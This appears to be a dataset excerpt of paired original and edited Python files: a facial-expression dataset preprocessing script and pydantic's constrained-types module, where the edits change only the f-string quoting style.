Columns:
- edited_code: string, lengths 17 to 978k
- original_code: string, lengths 17 to 978k
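In the rows that follow, each pair holds the same file twice: the `edited_code` cell reuses the enclosing quote character inside f-string replacement fields (legal only on Python 3.12+ under PEP 701), while the `original_code` cell alternates quote characters. A minimal constructed pair, not taken from the dataset, illustrates the pattern:

k = {"num_classes": 7}                 # hypothetical values, for illustration only
edited = f"FER{k["num_classes"]}"      # quote reuse: requires Python >= 3.12 (PEP 701)
original = f"FER{k['num_classes']}"    # alternated quotes: also valid on older versions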
edited_code:

import cv2
from tqdm import tqdm
from itertools import chain as iterchain

from ..raw import CK
from ..raw import JAFFE
from ..raw import FER2013
from ...paths import PATH_DATA_PROCESSED
from ...utils import *  # supplies the dlib helper functions used below


def iter_preproc_datasets(**kwargs):
    dataset1 = CK(**kwargs)
    dataset2 = JAFFE(**kwargs)
    dataset = iterchain(dataset1, dataset2)
    size = (48, 48)
    detector = dlib_face_frontal_detector()
    for image, class_name in dataset:
        rectangles = get_faces_rectangles(image, detector)
        # crop to the first detected face (assumes at least one detection)
        rectangle = rectangles[0]
        x, y, w, h = dlib_rectangle_to_numpy_box(image.shape, rectangle)
        image = image[y:y+h, x:x+w]
        image = cv2.resize(image, size)
        yield image, class_name


def iter_fer_2013(**kwargs):
    return iter(FER2013(**kwargs))


def iter_samples(**kwargs):
    datapath = PATH_DATA_PROCESSED.joinpath(f"FER{kwargs["num_classes"]}")
    datapath.mkdir(parents=True, exist_ok=True)
    dataset = iterchain(iter_preproc_datasets(**kwargs), iter_fer_2013(**kwargs))
    for index, sample in enumerate(tqdm(dataset)):
        yield (datapath, index) + sample


def save_sample(args):
    datapath, index, image, class_name = args
    savepath = datapath / class_name
    if not savepath.exists():
        savepath.mkdir(parents=True, exist_ok=True)
    filename = savepath.joinpath(f'{index}.png').as_posix()
    cv2.imwrite(filename, image)
    print('Saved:', filename)


def generate(**kwargs):
    # expose the save callback and the sample stream for the caller to combine
    return save_sample, iter_samples(**kwargs)
original_code:

import cv2
from tqdm import tqdm
from itertools import chain as iterchain

from ..raw import CK
from ..raw import JAFFE
from ..raw import FER2013
from ...paths import PATH_DATA_PROCESSED
from ...utils import *  # supplies the dlib helper functions used below


def iter_preproc_datasets(**kwargs):
    dataset1 = CK(**kwargs)
    dataset2 = JAFFE(**kwargs)
    dataset = iterchain(dataset1, dataset2)
    size = (48, 48)
    detector = dlib_face_frontal_detector()
    for image, class_name in dataset:
        rectangles = get_faces_rectangles(image, detector)
        # crop to the first detected face (assumes at least one detection)
        rectangle = rectangles[0]
        x, y, w, h = dlib_rectangle_to_numpy_box(image.shape, rectangle)
        image = image[y:y+h, x:x+w]
        image = cv2.resize(image, size)
        yield image, class_name


def iter_fer_2013(**kwargs):
    return iter(FER2013(**kwargs))


def iter_samples(**kwargs):
    datapath = PATH_DATA_PROCESSED.joinpath(f"FER{kwargs['num_classes']}")
    datapath.mkdir(parents=True, exist_ok=True)
    dataset = iterchain(iter_preproc_datasets(**kwargs), iter_fer_2013(**kwargs))
    for index, sample in enumerate(tqdm(dataset)):
        yield (datapath, index) + sample


def save_sample(args):
    datapath, index, image, class_name = args
    savepath = datapath / class_name
    if not savepath.exists():
        savepath.mkdir(parents=True, exist_ok=True)
    filename = savepath.joinpath(f'{index}.png').as_posix()
    cv2.imwrite(filename, image)
    print('Saved:', filename)


def generate(**kwargs):
    # expose the save callback and the sample stream for the caller to combine
    return save_sample, iter_samples(**kwargs)
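Note that `generate()` returns the save callback together with the sample stream instead of performing the writes itself. The dump does not show the call site, so the driver below is a hypothetical sketch; the `num_classes` value and the importability of `generate` are assumptions, not part of the dataset:

# Hypothetical driver: maps save_sample over iter_samples(), for example
# with a process pool, since the callback is module-level and each sample
# tuple (datapath, index, image, class_name) is picklable.
from multiprocessing import Pool

def run(**kwargs):
    save_fn, samples = generate(**kwargs)   # e.g. kwargs = {"num_classes": 7}
    with Pool() as pool:
        for _ in pool.imap_unordered(save_fn, samples):
            pass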
import math import re import warnings from decimal import Decimal from enum import Enum from pathlib import Path from types import new_class from typing import ( TYPE_CHECKING, Any, Callable, ClassVar, Dict, List, Optional, Pattern, Set, Type, TypeVar, Union, cast, ) from uuid import UUID from . import errors from .utils import import_string, update_not_none from .validators import ( bytes_validator, constr_length_validator, constr_strip_whitespace, decimal_validator, float_validator, int_validator, list_validator, number_multiple_validator, number_size_validator, path_exists_validator, path_validator, set_validator, str_validator, strict_float_validator, strict_int_validator, strict_str_validator, ) __all__ = [ 'NoneStr', 'NoneBytes', 'StrBytes', 'NoneStrBytes', 'StrictStr', 'ConstrainedBytes', 'conbytes', 'ConstrainedList', 'conlist', 'ConstrainedSet', 'conset', 'ConstrainedStr', 'constr', 'PyObject', 'ConstrainedInt', 'conint', 'PositiveInt', 'NegativeInt', 'ConstrainedFloat', 'confloat', 'PositiveFloat', 'NegativeFloat', 'ConstrainedDecimal', 'condecimal', 'UUID1', 'UUID3', 'UUID4', 'UUID5', 'FilePath', 'DirectoryPath', 'Json', 'JsonWrapper', 'SecretStr', 'SecretBytes', 'StrictBool', 'StrictInt', 'StrictFloat', 'PaymentCardNumber', 'ByteSize', ] NoneStr = Optional[str] NoneBytes = Optional[bytes] StrBytes = Union[str, bytes] NoneStrBytes = Optional[StrBytes] OptionalInt = Optional[int] OptionalIntFloat = Union[OptionalInt, float] OptionalIntFloatDecimal = Union[OptionalIntFloat, Decimal] StrIntFloat = Union[str, int, float] if TYPE_CHECKING: from .dataclasses import DataclassType # noqa: F401 from .fields import ModelField from .main import BaseConfig, BaseModel # noqa: F401 from .typing import CallableGenerator ModelOrDc = Type[Union['BaseModel', 'DataclassType']] class ConstrainedBytes(bytes): strip_whitespace = False min_length: OptionalInt = None max_length: OptionalInt = None @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none(field_schema, minLength=cls.min_length, maxLength=cls.max_length) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield bytes_validator yield constr_strip_whitespace yield constr_length_validator def conbytes(*, strip_whitespace: bool = False, min_length: int = None, max_length: int = None) -> Type[bytes]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict(strip_whitespace=strip_whitespace, min_length=min_length, max_length=max_length) return type('ConstrainedBytesValue', (ConstrainedBytes,), namespace) T = TypeVar('T') # This types superclass should be List[T], but cython chokes on that... 
class ConstrainedList(list): # type: ignore # Needed for pydantic to detect that this is a list __origin__ = list __args__: List[Type[T]] # type: ignore min_items: Optional[int] = None max_items: Optional[int] = None item_type: Type[T] # type: ignore @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.list_length_validator @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none(field_schema, minItems=cls.min_items, maxItems=cls.max_items) @classmethod def list_length_validator(cls, v: 'Optional[List[T]]', field: 'ModelField') -> 'Optional[List[T]]': if v is None and not field.required: return None v = list_validator(v) v_len = len(v) if cls.min_items is not None and v_len < cls.min_items: raise errors.ListMinLengthError(limit_value=cls.min_items) if cls.max_items is not None and v_len > cls.max_items: raise errors.ListMaxLengthError(limit_value=cls.max_items) return v def conlist(item_type: Type[T], *, min_items: int = None, max_items: int = None) -> Type[List[T]]: # __args__ is needed to conform to typing generics api namespace = {'min_items': min_items, 'max_items': max_items, 'item_type': item_type, '__args__': [item_type]} # We use new_class to be able to deal with Generic types return new_class('ConstrainedListValue', (ConstrainedList,), {}, lambda ns: ns.update(namespace)) # This types superclass should be Set[T], but cython chokes on that... class ConstrainedSet(set): # type: ignore # Needed for pydantic to detect that this is a set __origin__ = set __args__: Set[Type[T]] # type: ignore min_items: Optional[int] = None max_items: Optional[int] = None item_type: Type[T] # type: ignore @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.set_length_validator @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none(field_schema, minItems=cls.min_items, maxItems=cls.max_items) @classmethod def set_length_validator(cls, v: 'Optional[Set[T]]', field: 'ModelField') -> 'Optional[Set[T]]': v = set_validator(v) v_len = len(v) if cls.min_items is not None and v_len < cls.min_items: raise errors.SetMinLengthError(limit_value=cls.min_items) if cls.max_items is not None and v_len > cls.max_items: raise errors.SetMaxLengthError(limit_value=cls.max_items) return v def conset(item_type: Type[T], *, min_items: int = None, max_items: int = None) -> Type[Set[T]]: # __args__ is needed to conform to typing generics api namespace = {'min_items': min_items, 'max_items': max_items, 'item_type': item_type, '__args__': [item_type]} # We use new_class to be able to deal with Generic types return new_class('ConstrainedSetValue', (ConstrainedSet,), {}, lambda ns: ns.update(namespace)) class ConstrainedStr(str): strip_whitespace = False min_length: OptionalInt = None max_length: OptionalInt = None curtail_length: OptionalInt = None regex: Optional[Pattern[str]] = None strict = False @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none( field_schema, minLength=cls.min_length, maxLength=cls.max_length, pattern=cls.regex and cls.regex.pattern ) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield strict_str_validator if cls.strict else str_validator yield constr_strip_whitespace yield constr_length_validator yield cls.validate @classmethod def validate(cls, value: Union[str]) -> Union[str]: if cls.curtail_length and len(value) > cls.curtail_length: value = value[: cls.curtail_length] if cls.regex: if not cls.regex.match(value): raise 
errors.StrRegexError(pattern=cls.regex.pattern) return value def constr( *, strip_whitespace: bool = False, strict: bool = False, min_length: int = None, max_length: int = None, curtail_length: int = None, regex: str = None, ) -> Type[str]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict( strip_whitespace=strip_whitespace, strict=strict, min_length=min_length, max_length=max_length, curtail_length=curtail_length, regex=regex and re.compile(regex), ) return type('ConstrainedStrValue', (ConstrainedStr,), namespace) class StrictStr(ConstrainedStr): strict = True if TYPE_CHECKING: StrictBool = bool else: class StrictBool(int): """ StrictBool to allow for bools which are not type-coerced. """ @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='boolean') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, value: Any) -> bool: """ Ensure that we only allow bools. """ if isinstance(value, bool): return value raise errors.StrictBoolError() class PyObject: validate_always = True @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, value: Any) -> Any: if isinstance(value, Callable): # type: ignore return value try: value = str_validator(value) except errors.StrError: raise errors.PyObjectError(error_message='value is neither a valid import path not a valid callable') try: return import_string(value) except ImportError as e: raise errors.PyObjectError(error_message=str(e)) if TYPE_CHECKING: def __call__(self, *args: Any, **kwargs: Any) -> Any: ... class ConstrainedNumberMeta(type): def __new__(cls, name: str, bases: Any, dct: Dict[str, Any]) -> 'ConstrainedInt': # type: ignore new_cls = cast('ConstrainedInt', type.__new__(cls, name, bases, dct)) if new_cls.gt is not None and new_cls.ge is not None: raise errors.ConfigError('bounds gt and ge cannot be specified at the same time') if new_cls.lt is not None and new_cls.le is not None: raise errors.ConfigError('bounds lt and le cannot be specified at the same time') return new_cls class ConstrainedInt(int, metaclass=ConstrainedNumberMeta): strict: bool = False gt: OptionalInt = None ge: OptionalInt = None lt: OptionalInt = None le: OptionalInt = None multiple_of: OptionalInt = None @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none( field_schema, exclusiveMinimum=cls.gt, exclusiveMaximum=cls.lt, minimum=cls.ge, maximum=cls.le, multipleOf=cls.multiple_of, ) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield strict_int_validator if cls.strict else int_validator yield number_size_validator yield number_multiple_validator def conint( *, strict: bool = False, gt: int = None, ge: int = None, lt: int = None, le: int = None, multiple_of: int = None ) -> Type[int]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict(strict=strict, gt=gt, ge=ge, lt=lt, le=le, multiple_of=multiple_of) return type('ConstrainedIntValue', (ConstrainedInt,), namespace) class PositiveInt(ConstrainedInt): gt = 0 class NegativeInt(ConstrainedInt): lt = 0 class StrictInt(ConstrainedInt): strict = True class ConstrainedFloat(float, metaclass=ConstrainedNumberMeta): strict: bool = False gt: OptionalIntFloat = None ge: OptionalIntFloat = None lt: OptionalIntFloat = None le: OptionalIntFloat = None multiple_of: OptionalIntFloat = None @classmethod def __modify_schema__(cls, 
field_schema: Dict[str, Any]) -> None: update_not_none( field_schema, exclusiveMinimum=cls.gt, exclusiveMaximum=cls.lt, minimum=cls.ge, maximum=cls.le, multipleOf=cls.multiple_of, ) # Modify constraints to account for differences between IEEE floats and JSON if field_schema.get('exclusiveMinimum') == -math.inf: del field_schema['exclusiveMinimum'] if field_schema.get('minimum') == -math.inf: del field_schema['minimum'] if field_schema.get('exclusiveMaximum') == math.inf: del field_schema['exclusiveMaximum'] if field_schema.get('maximum') == math.inf: del field_schema['maximum'] @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield strict_float_validator if cls.strict else float_validator yield number_size_validator yield number_multiple_validator def confloat( *, strict: bool = False, gt: float = None, ge: float = None, lt: float = None, le: float = None, multiple_of: float = None, ) -> Type[float]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict(strict=strict, gt=gt, ge=ge, lt=lt, le=le, multiple_of=multiple_of) return type('ConstrainedFloatValue', (ConstrainedFloat,), namespace) class PositiveFloat(ConstrainedFloat): gt = 0 class NegativeFloat(ConstrainedFloat): lt = 0 class StrictFloat(ConstrainedFloat): strict = True class ConstrainedDecimal(Decimal, metaclass=ConstrainedNumberMeta): gt: OptionalIntFloatDecimal = None ge: OptionalIntFloatDecimal = None lt: OptionalIntFloatDecimal = None le: OptionalIntFloatDecimal = None max_digits: OptionalInt = None decimal_places: OptionalInt = None multiple_of: OptionalIntFloatDecimal = None @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none( field_schema, exclusiveMinimum=cls.gt, exclusiveMaximum=cls.lt, minimum=cls.ge, maximum=cls.le, multipleOf=cls.multiple_of, ) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield decimal_validator yield number_size_validator yield number_multiple_validator yield cls.validate @classmethod def validate(cls, value: Decimal) -> Decimal: digit_tuple, exponent = value.as_tuple()[1:] if exponent in {'F', 'n', 'N'}: raise errors.DecimalIsNotFiniteError() if exponent >= 0: # A positive exponent adds that many trailing zeros. digits = len(digit_tuple) + exponent decimals = 0 else: # If the absolute value of the negative exponent is larger than the # number of digits, then it's the same as the number of digits, # because it'll consume all of the digits in digit_tuple and then # add abs(exponent) - len(digit_tuple) leading zeros after the # decimal point. 
if abs(exponent) > len(digit_tuple): digits = decimals = abs(exponent) else: digits = len(digit_tuple) decimals = abs(exponent) whole_digits = digits - decimals if cls.max_digits is not None and digits > cls.max_digits: raise errors.DecimalMaxDigitsError(max_digits=cls.max_digits) if cls.decimal_places is not None and decimals > cls.decimal_places: raise errors.DecimalMaxPlacesError(decimal_places=cls.decimal_places) if cls.max_digits is not None and cls.decimal_places is not None: expected = cls.max_digits - cls.decimal_places if whole_digits > expected: raise errors.DecimalWholeDigitsError(whole_digits=expected) return value def condecimal( *, gt: Decimal = None, ge: Decimal = None, lt: Decimal = None, le: Decimal = None, max_digits: int = None, decimal_places: int = None, multiple_of: Decimal = None, ) -> Type[Decimal]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict( gt=gt, ge=ge, lt=lt, le=le, max_digits=max_digits, decimal_places=decimal_places, multiple_of=multiple_of ) return type('ConstrainedDecimalValue', (ConstrainedDecimal,), namespace) class UUID1(UUID): _required_version = 1 @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='string', format=f'uuid{cls._required_version}') class UUID3(UUID1): _required_version = 3 class UUID4(UUID1): _required_version = 4 class UUID5(UUID1): _required_version = 5 class FilePath(Path): @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(format='file-path') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield path_validator yield path_exists_validator yield cls.validate @classmethod def validate(cls, value: Path) -> Path: if not value.is_file(): raise errors.PathNotAFileError(path=value) return value class DirectoryPath(Path): @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(format='directory-path') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield path_validator yield path_exists_validator yield cls.validate @classmethod def validate(cls, value: Path) -> Path: if not value.is_dir(): raise errors.PathNotADirectoryError(path=value) return value class JsonWrapper: pass class JsonMeta(type): def __getitem__(self, t: Type[Any]) -> Type[JsonWrapper]: return type('JsonWrapperValue', (JsonWrapper,), {'inner_type': t}) class Json(metaclass=JsonMeta): @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='string', format='json-string') class SecretStr: @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='string', writeOnly=True, format='password') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, value: Any) -> 'SecretStr': if isinstance(value, cls): return value value = str_validator(value) return cls(value) def __init__(self, value: str): self._secret_value = value def __repr__(self) -> str: return f"SecretStr('{self}')" def __str__(self) -> str: return '**********' if self._secret_value else '' def __eq__(self, other: Any) -> bool: return isinstance(other, SecretStr) and self.get_secret_value() == other.get_secret_value() def display(self) -> str: warnings.warn('`secret_str.display()` is deprecated, use `str(secret_str)` instead', DeprecationWarning) return str(self) def get_secret_value(self) -> str: return self._secret_value class SecretBytes: @classmethod def 
__modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='string', writeOnly=True, format='password') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, value: Any) -> 'SecretBytes': if isinstance(value, cls): return value value = bytes_validator(value) return cls(value) def __init__(self, value: bytes): self._secret_value = value def __repr__(self) -> str: return f"SecretBytes(b'{self}')" def __str__(self) -> str: return '**********' if self._secret_value else '' def __eq__(self, other: Any) -> bool: return isinstance(other, SecretBytes) and self.get_secret_value() == other.get_secret_value() def display(self) -> str: warnings.warn('`secret_bytes.display()` is deprecated, use `str(secret_bytes)` instead', DeprecationWarning) return str(self) def get_secret_value(self) -> bytes: return self._secret_value class PaymentCardBrand(str, Enum): amex = 'American Express' mastercard = 'Mastercard' visa = 'Visa' other = 'other' def __str__(self) -> str: return self.value class PaymentCardNumber(str): """ Based on: https://en.wikipedia.org/wiki/Payment_card_number """ strip_whitespace: ClassVar[bool] = True min_length: ClassVar[int] = 12 max_length: ClassVar[int] = 19 bin: str last4: str brand: PaymentCardBrand def __init__(self, card_number: str): self.bin = card_number[:6] self.last4 = card_number[-4:] self.brand = self._get_brand(card_number) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield str_validator yield constr_strip_whitespace yield constr_length_validator yield cls.validate_digits yield cls.validate_luhn_check_digit yield cls yield cls.validate_length_for_brand @property def masked(self) -> str: num_masked = len(self) - 10 # len(bin) + len(last4) == 10 return f'{self.bin}{'*' * num_masked}{self.last4}' @classmethod def validate_digits(cls, card_number: str) -> str: if not card_number.isdigit(): raise errors.NotDigitError return card_number @classmethod def validate_luhn_check_digit(cls, card_number: str) -> str: """ Based on: https://en.wikipedia.org/wiki/Luhn_algorithm """ sum_ = int(card_number[-1]) length = len(card_number) parity = length % 2 for i in range(length - 1): digit = int(card_number[i]) if i % 2 == parity: digit *= 2 if digit > 9: digit -= 9 sum_ += digit valid = sum_ % 10 == 0 if not valid: raise errors.LuhnValidationError return card_number @classmethod def validate_length_for_brand(cls, card_number: 'PaymentCardNumber') -> 'PaymentCardNumber': """ Validate length based on BIN for major brands: https://en.wikipedia.org/wiki/Payment_card_number#Issuer_identification_number_(IIN) """ required_length: Optional[int] = None if card_number.brand in {PaymentCardBrand.visa, PaymentCardBrand.mastercard}: required_length = 16 valid = len(card_number) == required_length elif card_number.brand == PaymentCardBrand.amex: required_length = 15 valid = len(card_number) == required_length else: valid = True if not valid: raise errors.InvalidLengthForBrand(brand=card_number.brand, required_length=required_length) return card_number @staticmethod def _get_brand(card_number: str) -> PaymentCardBrand: if card_number[0] == '4': brand = PaymentCardBrand.visa elif 51 <= int(card_number[:2]) <= 55: brand = PaymentCardBrand.mastercard elif card_number[:2] in {'34', '37'}: brand = PaymentCardBrand.amex else: brand = PaymentCardBrand.other return brand BYTE_SIZES = { 'b': 1, 'kb': 10 ** 3, 'mb': 10 ** 6, 'gb': 10 ** 9, 'tb': 10 ** 12, 'pb': 10 ** 15, 'eb': 10 ** 18, 'kib': 2 ** 10, 
'mib': 2 ** 20, 'gib': 2 ** 30, 'tib': 2 ** 40, 'pib': 2 ** 50, 'eib': 2 ** 60, } BYTE_SIZES.update({k.lower()[0]: v for k, v in BYTE_SIZES.items() if 'i' not in k}) byte_string_re = re.compile(r'^\s*(\d*\.?\d+)\s*(\w+)?', re.IGNORECASE) class ByteSize(int): @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, v: StrIntFloat) -> 'ByteSize': try: return cls(int(v)) except ValueError: pass str_match = byte_string_re.match(str(v)) if str_match is None: raise errors.InvalidByteSize() scalar, unit = str_match.groups() if unit is None: unit = 'b' try: unit_mult = BYTE_SIZES[unit.lower()] except KeyError: raise errors.InvalidByteSizeUnit(unit=unit) return cls(int(float(scalar) * unit_mult)) def human_readable(self, decimal: bool = False) -> str: if decimal: divisor = 1000 units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB'] final_unit = 'EB' else: divisor = 1024 units = ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB'] final_unit = 'EiB' num = float(self) for unit in units: if abs(num) < divisor: return f'{num:0.1f}{unit}' num /= divisor return f'{num:0.1f}{final_unit}' def to(self, unit: str) -> float: try: unit_div = BYTE_SIZES[unit.lower()] except KeyError: raise errors.InvalidByteSizeUnit(unit=unit) return self / unit_div
import math import re import warnings from decimal import Decimal from enum import Enum from pathlib import Path from types import new_class from typing import ( TYPE_CHECKING, Any, Callable, ClassVar, Dict, List, Optional, Pattern, Set, Type, TypeVar, Union, cast, ) from uuid import UUID from . import errors from .utils import import_string, update_not_none from .validators import ( bytes_validator, constr_length_validator, constr_strip_whitespace, decimal_validator, float_validator, int_validator, list_validator, number_multiple_validator, number_size_validator, path_exists_validator, path_validator, set_validator, str_validator, strict_float_validator, strict_int_validator, strict_str_validator, ) __all__ = [ 'NoneStr', 'NoneBytes', 'StrBytes', 'NoneStrBytes', 'StrictStr', 'ConstrainedBytes', 'conbytes', 'ConstrainedList', 'conlist', 'ConstrainedSet', 'conset', 'ConstrainedStr', 'constr', 'PyObject', 'ConstrainedInt', 'conint', 'PositiveInt', 'NegativeInt', 'ConstrainedFloat', 'confloat', 'PositiveFloat', 'NegativeFloat', 'ConstrainedDecimal', 'condecimal', 'UUID1', 'UUID3', 'UUID4', 'UUID5', 'FilePath', 'DirectoryPath', 'Json', 'JsonWrapper', 'SecretStr', 'SecretBytes', 'StrictBool', 'StrictInt', 'StrictFloat', 'PaymentCardNumber', 'ByteSize', ] NoneStr = Optional[str] NoneBytes = Optional[bytes] StrBytes = Union[str, bytes] NoneStrBytes = Optional[StrBytes] OptionalInt = Optional[int] OptionalIntFloat = Union[OptionalInt, float] OptionalIntFloatDecimal = Union[OptionalIntFloat, Decimal] StrIntFloat = Union[str, int, float] if TYPE_CHECKING: from .dataclasses import DataclassType # noqa: F401 from .fields import ModelField from .main import BaseConfig, BaseModel # noqa: F401 from .typing import CallableGenerator ModelOrDc = Type[Union['BaseModel', 'DataclassType']] class ConstrainedBytes(bytes): strip_whitespace = False min_length: OptionalInt = None max_length: OptionalInt = None @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none(field_schema, minLength=cls.min_length, maxLength=cls.max_length) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield bytes_validator yield constr_strip_whitespace yield constr_length_validator def conbytes(*, strip_whitespace: bool = False, min_length: int = None, max_length: int = None) -> Type[bytes]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict(strip_whitespace=strip_whitespace, min_length=min_length, max_length=max_length) return type('ConstrainedBytesValue', (ConstrainedBytes,), namespace) T = TypeVar('T') # This types superclass should be List[T], but cython chokes on that... 
class ConstrainedList(list): # type: ignore # Needed for pydantic to detect that this is a list __origin__ = list __args__: List[Type[T]] # type: ignore min_items: Optional[int] = None max_items: Optional[int] = None item_type: Type[T] # type: ignore @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.list_length_validator @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none(field_schema, minItems=cls.min_items, maxItems=cls.max_items) @classmethod def list_length_validator(cls, v: 'Optional[List[T]]', field: 'ModelField') -> 'Optional[List[T]]': if v is None and not field.required: return None v = list_validator(v) v_len = len(v) if cls.min_items is not None and v_len < cls.min_items: raise errors.ListMinLengthError(limit_value=cls.min_items) if cls.max_items is not None and v_len > cls.max_items: raise errors.ListMaxLengthError(limit_value=cls.max_items) return v def conlist(item_type: Type[T], *, min_items: int = None, max_items: int = None) -> Type[List[T]]: # __args__ is needed to conform to typing generics api namespace = {'min_items': min_items, 'max_items': max_items, 'item_type': item_type, '__args__': [item_type]} # We use new_class to be able to deal with Generic types return new_class('ConstrainedListValue', (ConstrainedList,), {}, lambda ns: ns.update(namespace)) # This types superclass should be Set[T], but cython chokes on that... class ConstrainedSet(set): # type: ignore # Needed for pydantic to detect that this is a set __origin__ = set __args__: Set[Type[T]] # type: ignore min_items: Optional[int] = None max_items: Optional[int] = None item_type: Type[T] # type: ignore @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.set_length_validator @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none(field_schema, minItems=cls.min_items, maxItems=cls.max_items) @classmethod def set_length_validator(cls, v: 'Optional[Set[T]]', field: 'ModelField') -> 'Optional[Set[T]]': v = set_validator(v) v_len = len(v) if cls.min_items is not None and v_len < cls.min_items: raise errors.SetMinLengthError(limit_value=cls.min_items) if cls.max_items is not None and v_len > cls.max_items: raise errors.SetMaxLengthError(limit_value=cls.max_items) return v def conset(item_type: Type[T], *, min_items: int = None, max_items: int = None) -> Type[Set[T]]: # __args__ is needed to conform to typing generics api namespace = {'min_items': min_items, 'max_items': max_items, 'item_type': item_type, '__args__': [item_type]} # We use new_class to be able to deal with Generic types return new_class('ConstrainedSetValue', (ConstrainedSet,), {}, lambda ns: ns.update(namespace)) class ConstrainedStr(str): strip_whitespace = False min_length: OptionalInt = None max_length: OptionalInt = None curtail_length: OptionalInt = None regex: Optional[Pattern[str]] = None strict = False @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none( field_schema, minLength=cls.min_length, maxLength=cls.max_length, pattern=cls.regex and cls.regex.pattern ) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield strict_str_validator if cls.strict else str_validator yield constr_strip_whitespace yield constr_length_validator yield cls.validate @classmethod def validate(cls, value: Union[str]) -> Union[str]: if cls.curtail_length and len(value) > cls.curtail_length: value = value[: cls.curtail_length] if cls.regex: if not cls.regex.match(value): raise 
errors.StrRegexError(pattern=cls.regex.pattern) return value def constr( *, strip_whitespace: bool = False, strict: bool = False, min_length: int = None, max_length: int = None, curtail_length: int = None, regex: str = None, ) -> Type[str]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict( strip_whitespace=strip_whitespace, strict=strict, min_length=min_length, max_length=max_length, curtail_length=curtail_length, regex=regex and re.compile(regex), ) return type('ConstrainedStrValue', (ConstrainedStr,), namespace) class StrictStr(ConstrainedStr): strict = True if TYPE_CHECKING: StrictBool = bool else: class StrictBool(int): """ StrictBool to allow for bools which are not type-coerced. """ @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='boolean') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, value: Any) -> bool: """ Ensure that we only allow bools. """ if isinstance(value, bool): return value raise errors.StrictBoolError() class PyObject: validate_always = True @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, value: Any) -> Any: if isinstance(value, Callable): # type: ignore return value try: value = str_validator(value) except errors.StrError: raise errors.PyObjectError(error_message='value is neither a valid import path not a valid callable') try: return import_string(value) except ImportError as e: raise errors.PyObjectError(error_message=str(e)) if TYPE_CHECKING: def __call__(self, *args: Any, **kwargs: Any) -> Any: ... class ConstrainedNumberMeta(type): def __new__(cls, name: str, bases: Any, dct: Dict[str, Any]) -> 'ConstrainedInt': # type: ignore new_cls = cast('ConstrainedInt', type.__new__(cls, name, bases, dct)) if new_cls.gt is not None and new_cls.ge is not None: raise errors.ConfigError('bounds gt and ge cannot be specified at the same time') if new_cls.lt is not None and new_cls.le is not None: raise errors.ConfigError('bounds lt and le cannot be specified at the same time') return new_cls class ConstrainedInt(int, metaclass=ConstrainedNumberMeta): strict: bool = False gt: OptionalInt = None ge: OptionalInt = None lt: OptionalInt = None le: OptionalInt = None multiple_of: OptionalInt = None @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none( field_schema, exclusiveMinimum=cls.gt, exclusiveMaximum=cls.lt, minimum=cls.ge, maximum=cls.le, multipleOf=cls.multiple_of, ) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield strict_int_validator if cls.strict else int_validator yield number_size_validator yield number_multiple_validator def conint( *, strict: bool = False, gt: int = None, ge: int = None, lt: int = None, le: int = None, multiple_of: int = None ) -> Type[int]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict(strict=strict, gt=gt, ge=ge, lt=lt, le=le, multiple_of=multiple_of) return type('ConstrainedIntValue', (ConstrainedInt,), namespace) class PositiveInt(ConstrainedInt): gt = 0 class NegativeInt(ConstrainedInt): lt = 0 class StrictInt(ConstrainedInt): strict = 